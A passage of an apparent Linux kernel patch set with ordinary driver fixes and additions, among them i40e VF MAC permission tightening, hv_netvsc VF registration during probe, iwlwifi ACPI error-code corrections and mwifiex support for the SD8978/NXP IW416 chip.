+--- a/drivers/mmc/host/sdhci-pci-o2micro.c
++++ b/drivers/mmc/host/sdhci-pci-o2micro.c
+@@ -602,6 +602,35 @@ static void sdhci_pci_o2_set_clock(struct sdhci_host *host, unsigned int clock)
+ 	sdhci_o2_enable_clk(host, clk);
+ }
+ 
++static void sdhci_pci_o2_set_power(struct sdhci_host *host, unsigned char mode,  unsigned short vdd)
++{
++	struct sdhci_pci_chip *chip;
++	struct sdhci_pci_slot *slot = sdhci_priv(host);
++	u32 scratch_32 = 0;
++	u8 scratch_8 = 0;
++
++	chip = slot->chip;
++
++	if (mode == MMC_POWER_OFF) {
++		/* UnLock WP */
++		pci_read_config_byte(chip->pdev, O2_SD_LOCK_WP, &scratch_8);
++		scratch_8 &= 0x7f;
++		pci_write_config_byte(chip->pdev, O2_SD_LOCK_WP, scratch_8);
++
++		/* Set PCR 0x354[16] to switch Clock Source back to OPE Clock */
++		pci_read_config_dword(chip->pdev, O2_SD_OUTPUT_CLK_SOURCE_SWITCH, &scratch_32);
++		scratch_32 &= ~(O2_SD_SEL_DLL);
++		pci_write_config_dword(chip->pdev, O2_SD_OUTPUT_CLK_SOURCE_SWITCH, scratch_32);
++
++		/* Lock WP */
++		pci_read_config_byte(chip->pdev, O2_SD_LOCK_WP, &scratch_8);
++		scratch_8 |= 0x80;
++		pci_write_config_byte(chip->pdev, O2_SD_LOCK_WP, scratch_8);
++	}
++
++	sdhci_set_power(host, mode, vdd);
++}
++
+ static int sdhci_pci_o2_probe_slot(struct sdhci_pci_slot *slot)
+ {
+ 	struct sdhci_pci_chip *chip;
+@@ -911,6 +940,7 @@ static const struct sdhci_ops sdhci_pci_o2_ops = {
+ 	.set_bus_width = sdhci_set_bus_width,
+ 	.reset = sdhci_reset,
+ 	.set_uhs_signaling = sdhci_set_uhs_signaling,
++	.set_power = sdhci_pci_o2_set_power,
+ };
+ 
+ const struct sdhci_pci_fixes sdhci_o2 = {
+diff --git a/drivers/net/can/dev/netlink.c b/drivers/net/can/dev/netlink.c
+index 8efa22d9f214d..053d375eae4f5 100644
+--- a/drivers/net/can/dev/netlink.c
++++ b/drivers/net/can/dev/netlink.c
+@@ -311,7 +311,7 @@ static int can_changelink(struct net_device *dev, struct nlattr *tb[],
+ 			/* Neither of TDC parameters nor TDC flags are
+ 			 * provided: do calculation
+ 			 */
+-			can_calc_tdco(&priv->tdc, priv->tdc_const, &priv->data_bittiming,
++			can_calc_tdco(&priv->tdc, priv->tdc_const, &dbt,
+ 				      &priv->ctrlmode, priv->ctrlmode_supported);
+ 		} /* else: both CAN_CTRLMODE_TDC_{AUTO,MANUAL} are explicitly
+ 		   * turned off. TDC is disabled: do nothing
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 63d43ef86f9b9..76455405a6d8e 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -5333,7 +5333,7 @@ static int i40e_pf_wait_queues_disabled(struct i40e_pf *pf)
+ {
+ 	int v, ret = 0;
+ 
+-	for (v = 0; v < pf->hw.func_caps.num_vsis; v++) {
++	for (v = 0; v < pf->num_alloc_vsi; v++) {
+ 		if (pf->vsi[v]) {
+ 			ret = i40e_vsi_wait_queues_disabled(pf->vsi[v]);
+ 			if (ret)
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index 3d3db58090ed1..ed4be80fec2a5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -2846,6 +2846,24 @@ static int i40e_vc_get_stats_msg(struct i40e_vf *vf, u8 *msg)
+ 				      (u8 *)&stats, sizeof(stats));
+ }
+ 
++/**
++ * i40e_can_vf_change_mac
++ * @vf: pointer to the VF info
++ *
++ * Return true if the VF is allowed to change its MAC filters, false otherwise
++ */
++static bool i40e_can_vf_change_mac(struct i40e_vf *vf)
++{
++	/* If the VF MAC address has been set administratively (via the
++	 * ndo_set_vf_mac command), then deny permission to the VF to
++	 * add/delete unicast MAC addresses, unless the VF is trusted
++	 */
++	if (vf->pf_set_mac && !vf->trusted)
++		return false;
++
++	return true;
++}
++
+ #define I40E_MAX_MACVLAN_PER_HW 3072
+ #define I40E_MAX_MACVLAN_PER_PF(num_ports) (I40E_MAX_MACVLAN_PER_HW /	\
+ 	(num_ports))
+@@ -2905,8 +2923,8 @@ static inline int i40e_check_vf_permission(struct i40e_vf *vf,
+ 		 * The VF may request to set the MAC address filter already
+ 		 * assigned to it so do not return an error in that case.
+ 		 */
+-		if (!test_bit(I40E_VIRTCHNL_VF_CAP_PRIVILEGE, &vf->vf_caps) &&
+-		    !is_multicast_ether_addr(addr) && vf->pf_set_mac &&
++		if (!i40e_can_vf_change_mac(vf) &&
++		    !is_multicast_ether_addr(addr) &&
+ 		    !ether_addr_equal(addr, vf->default_lan_addr.addr)) {
+ 			dev_err(&pf->pdev->dev,
+ 				"VF attempting to override administratively set MAC address, bring down and up the VF interface to resume normal operation\n");
+@@ -3049,19 +3067,29 @@ static int i40e_vc_del_mac_addr_msg(struct i40e_vf *vf, u8 *msg)
+ 			ret = I40E_ERR_INVALID_MAC_ADDR;
+ 			goto error_param;
+ 		}
+-		if (ether_addr_equal(al->list[i].addr, vf->default_lan_addr.addr))
+-			was_unimac_deleted = true;
+ 	}
+ 	vsi = pf->vsi[vf->lan_vsi_idx];
+ 
+ 	spin_lock_bh(&vsi->mac_filter_hash_lock);
+ 	/* delete addresses from the list */
+-	for (i = 0; i < al->num_elements; i++)
++	for (i = 0; i < al->num_elements; i++) {
++		const u8 *addr = al->list[i].addr;
++
++		/* Allow to delete VF primary MAC only if it was not set
++		 * administratively by PF or if VF is trusted.
++		 */
++		if (ether_addr_equal(addr, vf->default_lan_addr.addr) &&
++		    i40e_can_vf_change_mac(vf))
++			was_unimac_deleted = true;
++		else
++			continue;
++
+ 		if (i40e_del_mac_filter(vsi, al->list[i].addr)) {
+ 			ret = I40E_ERR_INVALID_MAC_ADDR;
+ 			spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 			goto error_param;
+ 		}
++	}
+ 
+ 	spin_unlock_bh(&vsi->mac_filter_hash_lock);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+index 3b9ba8fa247ab..dc2e204bcd727 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+@@ -65,6 +65,8 @@ int mlxsw_sp_acl_tcam_init(struct mlxsw_sp *mlxsw_sp,
+ 	tcam->max_groups = max_groups;
+ 	tcam->max_group_size = MLXSW_CORE_RES_GET(mlxsw_sp->core,
+ 						 ACL_MAX_GROUP_SIZE);
++	tcam->max_group_size = min_t(unsigned int, tcam->max_group_size,
++				     MLXSW_REG_PAGT_ACL_MAX_NUM);
+ 
+ 	err = ops->init(mlxsw_sp, tcam->priv, tcam);
+ 	if (err)
+diff --git a/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c b/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c
+index 41fa2523d91d3..5f2cd9a8cf8fb 100644
+--- a/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c
++++ b/drivers/net/ethernet/microchip/lan966x/lan966x_lag.c
+@@ -37,19 +37,24 @@ static void lan966x_lag_set_aggr_pgids(struct lan966x *lan966x)
+ 
+ 	/* Now, set PGIDs for each active LAG */
+ 	for (lag = 0; lag < lan966x->num_phys_ports; ++lag) {
+-		struct net_device *bond = lan966x->ports[lag]->bond;
++		struct lan966x_port *port = lan966x->ports[lag];
+ 		int num_active_ports = 0;
++		struct net_device *bond;
+ 		unsigned long bond_mask;
+ 		u8 aggr_idx[16];
+ 
+-		if (!bond || (visited & BIT(lag)))
++		if (!port || !port->bond || (visited & BIT(lag)))
+ 			continue;
+ 
++		bond = port->bond;
+ 		bond_mask = lan966x_lag_get_mask(lan966x, bond);
+ 
+ 		for_each_set_bit(p, &bond_mask, lan966x->num_phys_ports) {
+ 			struct lan966x_port *port = lan966x->ports[p];
+ 
++			if (!port)
++				continue;
++
+ 			lan_wr(ANA_PGID_PGID_SET(bond_mask),
+ 			       lan966x, ANA_PGID(p));
+ 			if (port->lag_tx_active)
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+index f7492be452aed..7af03b45555dd 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/conntrack.c
+@@ -1379,10 +1379,30 @@ static void nfp_nft_ct_translate_mangle_action(struct flow_action_entry *mangle_
+ 		mangle_action->mangle.mask = (__force u32)cpu_to_be32(mangle_action->mangle.mask);
+ 		return;
+ 
++	/* Both struct tcphdr and struct udphdr start with
++	 *	__be16 source;
++	 *	__be16 dest;
++	 * so we can use the same code for both.
++	 */
+ 	case FLOW_ACT_MANGLE_HDR_TYPE_TCP:
+ 	case FLOW_ACT_MANGLE_HDR_TYPE_UDP:
+-		mangle_action->mangle.val = (__force u16)cpu_to_be16(mangle_action->mangle.val);
+-		mangle_action->mangle.mask = (__force u16)cpu_to_be16(mangle_action->mangle.mask);
++		if (mangle_action->mangle.offset == offsetof(struct tcphdr, source)) {
++			mangle_action->mangle.val =
++				(__force u32)cpu_to_be32(mangle_action->mangle.val << 16);
++			/* The mask of mangle action is inverse mask,
++			 * so clear the dest tp port with 0xFFFF to
++			 * instead of rotate-left operation.
++			 */
++			mangle_action->mangle.mask =
++				(__force u32)cpu_to_be32(mangle_action->mangle.mask << 16 | 0xFFFF);
++		}
++		if (mangle_action->mangle.offset == offsetof(struct tcphdr, dest)) {
++			mangle_action->mangle.offset = 0;
++			mangle_action->mangle.val =
++				(__force u32)cpu_to_be32(mangle_action->mangle.val);
++			mangle_action->mangle.mask =
++				(__force u32)cpu_to_be32(mangle_action->mangle.mask);
++		}
+ 		return;
+ 
+ 	default:
+diff --git a/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c b/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c
+index 52f67157bd0f7..a3c52c91a575d 100644
+--- a/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c
++++ b/drivers/net/ethernet/netronome/nfp/flower/tunnel_conf.c
+@@ -980,7 +980,7 @@ nfp_tunnel_add_shared_mac(struct nfp_app *app, struct net_device *netdev,
+ 	u16 nfp_mac_idx = 0;
+ 
+ 	entry = nfp_tunnel_lookup_offloaded_macs(app, netdev->dev_addr);
+-	if (entry && nfp_tunnel_is_mac_idx_global(entry->index)) {
++	if (entry && (nfp_tunnel_is_mac_idx_global(entry->index) || netif_is_lag_port(netdev))) {
+ 		if (entry->bridge_count ||
+ 		    !nfp_flower_is_supported_bridge(netdev)) {
+ 			nfp_tunnel_offloaded_macs_inc_ref_and_link(entry,
+diff --git a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c
+index 33b4c28563162..3f10c5365c80e 100644
+--- a/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c
++++ b/drivers/net/ethernet/netronome/nfp/nfpcore/nfp6000_pcie.c
+@@ -537,11 +537,13 @@ static int enable_bars(struct nfp6000_pcie *nfp, u16 interface)
+ 	const u32 barcfg_msix_general =
+ 		NFP_PCIE_BAR_PCIE2CPP_MapType(
+ 			NFP_PCIE_BAR_PCIE2CPP_MapType_GENERAL) |
+-		NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT;
++		NFP_PCIE_BAR_PCIE2CPP_LengthSelect(
++			NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT);
+ 	const u32 barcfg_msix_xpb =
+ 		NFP_PCIE_BAR_PCIE2CPP_MapType(
+ 			NFP_PCIE_BAR_PCIE2CPP_MapType_BULK) |
+-		NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT |
++		NFP_PCIE_BAR_PCIE2CPP_LengthSelect(
++			NFP_PCIE_BAR_PCIE2CPP_LengthSelect_32BIT) |
+ 		NFP_PCIE_BAR_PCIE2CPP_Target_BaseAddress(
+ 			NFP_CPP_TARGET_ISLAND_XPB);
+ 	const u32 barcfg_explicit[4] = {
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index e988a60c8561b..66178ce6d000e 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -3826,6 +3826,9 @@ static int __stmmac_open(struct net_device *dev,
+ 	priv->rx_copybreak = STMMAC_RX_COPYBREAK;
+ 
+ 	buf_sz = dma_conf->dma_buf_sz;
++	for (int i = 0; i < MTL_MAX_TX_QUEUES; i++)
++		if (priv->dma_conf.tx_queue[i].tbs & STMMAC_TBS_EN)
++			dma_conf->tx_queue[i].tbs = priv->dma_conf.tx_queue[i].tbs;
+ 	memcpy(&priv->dma_conf, dma_conf, sizeof(*dma_conf));
+ 
+ 	stmmac_reset_queues_param(priv);
+diff --git a/drivers/net/ethernet/ti/cpsw.c b/drivers/net/ethernet/ti/cpsw.c
+index 13c9c2d6b79bb..d95771ca4e5a3 100644
+--- a/drivers/net/ethernet/ti/cpsw.c
++++ b/drivers/net/ethernet/ti/cpsw.c
+@@ -631,6 +631,8 @@ static void cpsw_slave_open(struct cpsw_slave *slave, struct cpsw_priv *priv)
+ 		}
+ 	}
+ 
++	phy->mac_managed_pm = true;
++
+ 	slave->phy = phy;
+ 
+ 	phy_attached_info(slave->phy);
+diff --git a/drivers/net/ethernet/ti/cpsw_new.c b/drivers/net/ethernet/ti/cpsw_new.c
+index 83596ec0c7cb9..6e70aa1cc7bf1 100644
+--- a/drivers/net/ethernet/ti/cpsw_new.c
++++ b/drivers/net/ethernet/ti/cpsw_new.c
+@@ -772,6 +772,9 @@ static void cpsw_slave_open(struct cpsw_slave *slave, struct cpsw_priv *priv)
+ 			slave->slave_num);
+ 		return;
+ 	}
++
++	phy->mac_managed_pm = true;
++
+ 	slave->phy = phy;
+ 
+ 	phy_attached_info(slave->phy);
+diff --git a/drivers/net/hyperv/netvsc.c b/drivers/net/hyperv/netvsc.c
+index da737d959e81c..3a834d4e1c842 100644
+--- a/drivers/net/hyperv/netvsc.c
++++ b/drivers/net/hyperv/netvsc.c
+@@ -740,7 +740,10 @@ void netvsc_device_remove(struct hv_device *device)
+ 	/* Disable NAPI and disassociate its context from the device. */
+ 	for (i = 0; i < net_device->num_chn; i++) {
+ 		/* See also vmbus_reset_channel_cb(). */
+-		napi_disable(&net_device->chan_table[i].napi);
++		/* only disable enabled NAPI channel */
++		if (i < ndev->real_num_rx_queues)
++			napi_disable(&net_device->chan_table[i].napi);
++
+ 		netif_napi_del(&net_device->chan_table[i].napi);
+ 	}
+ 
+diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c
+index c1aac6ceb29e6..1b74055399840 100644
+--- a/drivers/net/hyperv/netvsc_drv.c
++++ b/drivers/net/hyperv/netvsc_drv.c
+@@ -42,6 +42,10 @@
+ #define LINKCHANGE_INT (2 * HZ)
+ #define VF_TAKEOVER_INT (HZ / 10)
+ 
++/* Macros to define the context of vf registration */
++#define VF_REG_IN_PROBE		1
++#define VF_REG_IN_NOTIFIER	2
++
+ static unsigned int ring_size __ro_after_init = 128;
+ module_param(ring_size, uint, 0444);
+ MODULE_PARM_DESC(ring_size, "Ring buffer size (# of 4K pages)");
+@@ -2181,7 +2185,7 @@ static rx_handler_result_t netvsc_vf_handle_frame(struct sk_buff **pskb)
+ }
+ 
+ static int netvsc_vf_join(struct net_device *vf_netdev,
+-			  struct net_device *ndev)
++			  struct net_device *ndev, int context)
+ {
+ 	struct net_device_context *ndev_ctx = netdev_priv(ndev);
+ 	int ret;
+@@ -2204,7 +2208,11 @@ static int netvsc_vf_join(struct net_device *vf_netdev,
+ 		goto upper_link_failed;
+ 	}
+ 
+-	schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT);
++	/* If this registration is called from probe context vf_takeover
++	 * is taken care of later in probe itself.
++	 */
++	if (context == VF_REG_IN_NOTIFIER)
++		schedule_delayed_work(&ndev_ctx->vf_takeover, VF_TAKEOVER_INT);
+ 
+ 	call_netdevice_notifiers(NETDEV_JOIN, vf_netdev);
+ 
+@@ -2342,7 +2350,7 @@ static int netvsc_prepare_bonding(struct net_device *vf_netdev)
+ 	return NOTIFY_DONE;
+ }
+ 
+-static int netvsc_register_vf(struct net_device *vf_netdev)
++static int netvsc_register_vf(struct net_device *vf_netdev, int context)
+ {
+ 	struct net_device_context *net_device_ctx;
+ 	struct netvsc_device *netvsc_dev;
+@@ -2382,7 +2390,7 @@ static int netvsc_register_vf(struct net_device *vf_netdev)
+ 
+ 	netdev_info(ndev, "VF registering: %s\n", vf_netdev->name);
+ 
+-	if (netvsc_vf_join(vf_netdev, ndev) != 0)
++	if (netvsc_vf_join(vf_netdev, ndev, context) != 0)
+ 		return NOTIFY_DONE;
+ 
+ 	dev_hold(vf_netdev);
+@@ -2480,10 +2488,31 @@ static int netvsc_unregister_vf(struct net_device *vf_netdev)
+ 	return NOTIFY_OK;
+ }
+ 
++static int check_dev_is_matching_vf(struct net_device *event_ndev)
++{
++	/* Skip NetVSC interfaces */
++	if (event_ndev->netdev_ops == &device_ops)
++		return -ENODEV;
++
++	/* Avoid non-Ethernet type devices */
++	if (event_ndev->type != ARPHRD_ETHER)
++		return -ENODEV;
++
++	/* Avoid Vlan dev with same MAC registering as VF */
++	if (is_vlan_dev(event_ndev))
++		return -ENODEV;
++
++	/* Avoid Bonding master dev with same MAC registering as VF */
++	if (netif_is_bond_master(event_ndev))
++		return -ENODEV;
++
++	return 0;
++}
++
+ static int netvsc_probe(struct hv_device *dev,
+ 			const struct hv_vmbus_device_id *dev_id)
+ {
+-	struct net_device *net = NULL;
++	struct net_device *net = NULL, *vf_netdev;
+ 	struct net_device_context *net_device_ctx;
+ 	struct netvsc_device_info *device_info = NULL;
+ 	struct netvsc_device *nvdev;
+@@ -2592,6 +2621,30 @@ static int netvsc_probe(struct hv_device *dev,
+ 	}
+ 
+ 	list_add(&net_device_ctx->list, &netvsc_dev_list);
++
++	/* When the hv_netvsc driver is unloaded and reloaded, the
++	 * NET_DEVICE_REGISTER for the vf device is replayed before probe
++	 * is complete. This is because register_netdevice_notifier() gets
++	 * registered before vmbus_driver_register() so that callback func
++	 * is set before probe and we don't miss events like NETDEV_POST_INIT
++	 * So, in this section we try to register the matching vf device that
++	 * is present as a netdevice, knowing that its register call is not
++	 * processed in the netvsc_netdev_notifier(as probing is progress and
++	 * get_netvsc_byslot fails).
++	 */
++	for_each_netdev(dev_net(net), vf_netdev) {
++		ret = check_dev_is_matching_vf(vf_netdev);
++		if (ret != 0)
++			continue;
++
++		if (net != get_netvsc_byslot(vf_netdev))
++			continue;
++
++		netvsc_prepare_bonding(vf_netdev);
++		netvsc_register_vf(vf_netdev, VF_REG_IN_PROBE);
++		__netvsc_vf_setup(net, vf_netdev);
++		break;
++	}
+ 	rtnl_unlock();
+ 
+ 	netvsc_devinfo_put(device_info);
+@@ -2748,28 +2801,17 @@ static int netvsc_netdev_event(struct notifier_block *this,
+ 			       unsigned long event, void *ptr)
+ {
+ 	struct net_device *event_dev = netdev_notifier_info_to_dev(ptr);
++	int ret = 0;
+ 
+-	/* Skip our own events */
+-	if (event_dev->netdev_ops == &device_ops)
+-		return NOTIFY_DONE;
+-
+-	/* Avoid non-Ethernet type devices */
+-	if (event_dev->type != ARPHRD_ETHER)
+-		return NOTIFY_DONE;
+-
+-	/* Avoid Vlan dev with same MAC registering as VF */
+-	if (is_vlan_dev(event_dev))
+-		return NOTIFY_DONE;
+-
+-	/* Avoid Bonding master dev with same MAC registering as VF */
+-	if (netif_is_bond_master(event_dev))
++	ret = check_dev_is_matching_vf(event_dev);
++	if (ret != 0)
+ 		return NOTIFY_DONE;
+ 
+ 	switch (event) {
+ 	case NETDEV_POST_INIT:
+ 		return netvsc_prepare_bonding(event_dev);
+ 	case NETDEV_REGISTER:
+-		return netvsc_register_vf(event_dev);
++		return netvsc_register_vf(event_dev, VF_REG_IN_NOTIFIER);
+ 	case NETDEV_UNREGISTER:
+ 		return netvsc_unregister_vf(event_dev);
+ 	case NETDEV_UP:
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index 585e8cd2d332d..f5fcc547de391 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -576,7 +576,7 @@ int iwl_sar_get_wrds_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 2) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -592,7 +592,7 @@ int iwl_sar_get_wrds_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 1) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -608,7 +608,7 @@ int iwl_sar_get_wrds_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 0) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -665,7 +665,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 2) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -681,7 +681,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 1) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -697,7 +697,7 @@ int iwl_sar_get_ewrd_table(struct iwl_fw_runtime *fwrt)
+ 					 &tbl_rev);
+ 	if (!IS_ERR(wifi_pkg)) {
+ 		if (tbl_rev != 0) {
+-			ret = PTR_ERR(wifi_pkg);
++			ret = -EINVAL;
+ 			goto out_free;
+ 		}
+ 
+@@ -1044,6 +1044,9 @@ int iwl_acpi_get_ppag_table(struct iwl_fw_runtime *fwrt)
+ 		goto read_table;
+ 	}
+ 
++	ret = PTR_ERR(wifi_pkg);
++	goto out_free;
++
+ read_table:
+ 	fwrt->ppag_ver = tbl_rev;
+ 	flags = &wifi_pkg->package.elements[1];
+diff --git a/drivers/net/wireless/marvell/mwifiex/Kconfig b/drivers/net/wireless/marvell/mwifiex/Kconfig
+index 2b4ff2b78a7e1..b182f7155d66f 100644
+--- a/drivers/net/wireless/marvell/mwifiex/Kconfig
++++ b/drivers/net/wireless/marvell/mwifiex/Kconfig
+@@ -10,13 +10,14 @@ config MWIFIEX
+ 	  mwifiex.
+ 
+ config MWIFIEX_SDIO
+-	tristate "Marvell WiFi-Ex Driver for SD8786/SD8787/SD8797/SD8887/SD8897/SD8977/SD8987/SD8997"
++	tristate "Marvell WiFi-Ex Driver for SD8786/SD8787/SD8797/SD8887/SD8897/SD8977/SD8978/SD8987/SD8997"
+ 	depends on MWIFIEX && MMC
+ 	select FW_LOADER
+ 	select WANT_DEV_COREDUMP
+ 	help
+ 	  This adds support for wireless adapters based on Marvell
+-	  8786/8787/8797/8887/8897/8977/8987/8997 chipsets with SDIO interface.
++	  8786/8787/8797/8887/8897/8977/8978/8987/8997 chipsets with
++	  SDIO interface. SD8978 is also known as NXP IW416.
+ 
+ 	  If you choose to build it as a module, it will be called
+ 	  mwifiex_sdio.
+diff --git a/drivers/net/wireless/marvell/mwifiex/sdio.c b/drivers/net/wireless/marvell/mwifiex/sdio.c
+index ea1c1c2412e72..2c9b70e9a7263 100644
+--- a/drivers/net/wireless/marvell/mwifiex/sdio.c
++++ b/drivers/net/wireless/marvell/mwifiex/sdio.c
+@@ -263,7 +263,7 @@ static const struct mwifiex_sdio_card_reg mwifiex_reg_sd8887 = {
+ 				 0x68, 0x69, 0x6a},
+ };
+ 
+-static const struct mwifiex_sdio_card_reg mwifiex_reg_sd8987 = {
++static const struct mwifiex_sdio_card_reg mwifiex_reg_sd89xx = {
+ 	.start_rd_port = 0,
+ 	.start_wr_port = 0,
+ 	.base_0_reg = 0xF8,
+@@ -331,6 +331,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8786 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = false,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8787 = {
+@@ -346,6 +347,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8787 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8797 = {
+@@ -361,6 +363,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8797 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8897 = {
+@@ -376,6 +379,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8897 = {
+ 	.can_dump_fw = true,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8977 = {
+@@ -392,6 +396,24 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8977 = {
+ 	.fw_dump_enh = true,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
++};
++
++static const struct mwifiex_sdio_device mwifiex_sdio_sd8978 = {
++	.firmware_sdiouart = SD8978_SDIOUART_FW_NAME,
++	.reg = &mwifiex_reg_sd89xx,
++	.max_ports = 32,
++	.mp_agg_pkt_limit = 16,
++	.tx_buf_size = MWIFIEX_TX_DATA_BUF_SIZE_4K,
++	.mp_tx_agg_buf_size = MWIFIEX_MP_AGGR_BUF_SIZE_MAX,
++	.mp_rx_agg_buf_size = MWIFIEX_MP_AGGR_BUF_SIZE_MAX,
++	.supports_sdio_new_mode = true,
++	.has_control_mask = false,
++	.can_dump_fw = true,
++	.fw_dump_enh = true,
++	.can_auto_tdls = false,
++	.can_ext_scan = true,
++	.fw_ready_extra_delay = true,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8997 = {
+@@ -409,6 +431,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8997 = {
+ 	.fw_dump_enh = true,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8887 = {
+@@ -424,11 +447,12 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8887 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = true,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8987 = {
+ 	.firmware = SD8987_DEFAULT_FW_NAME,
+-	.reg = &mwifiex_reg_sd8987,
++	.reg = &mwifiex_reg_sd89xx,
+ 	.max_ports = 32,
+ 	.mp_agg_pkt_limit = 16,
+ 	.tx_buf_size = MWIFIEX_TX_DATA_BUF_SIZE_2K,
+@@ -440,6 +464,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8987 = {
+ 	.fw_dump_enh = true,
+ 	.can_auto_tdls = true,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static const struct mwifiex_sdio_device mwifiex_sdio_sd8801 = {
+@@ -455,6 +480,7 @@ static const struct mwifiex_sdio_device mwifiex_sdio_sd8801 = {
+ 	.can_dump_fw = false,
+ 	.can_auto_tdls = false,
+ 	.can_ext_scan = true,
++	.fw_ready_extra_delay = false,
+ };
+ 
+ static struct memory_type_mapping generic_mem_type_map[] = {
+@@ -482,7 +508,9 @@ static struct memory_type_mapping mem_type_mapping_tbl[] = {
+ static const struct of_device_id mwifiex_sdio_of_match_table[] __maybe_unused = {
+ 	{ .compatible = "marvell,sd8787" },
+ 	{ .compatible = "marvell,sd8897" },
++	{ .compatible = "marvell,sd8978" },
+ 	{ .compatible = "marvell,sd8997" },
++	{ .compatible = "nxp,iw416" },
+ 	{ }
+ };
+ 
+@@ -545,6 +573,7 @@ mwifiex_sdio_probe(struct sdio_func *func, const struct sdio_device_id *id)
+ 		card->fw_dump_enh = data->fw_dump_enh;
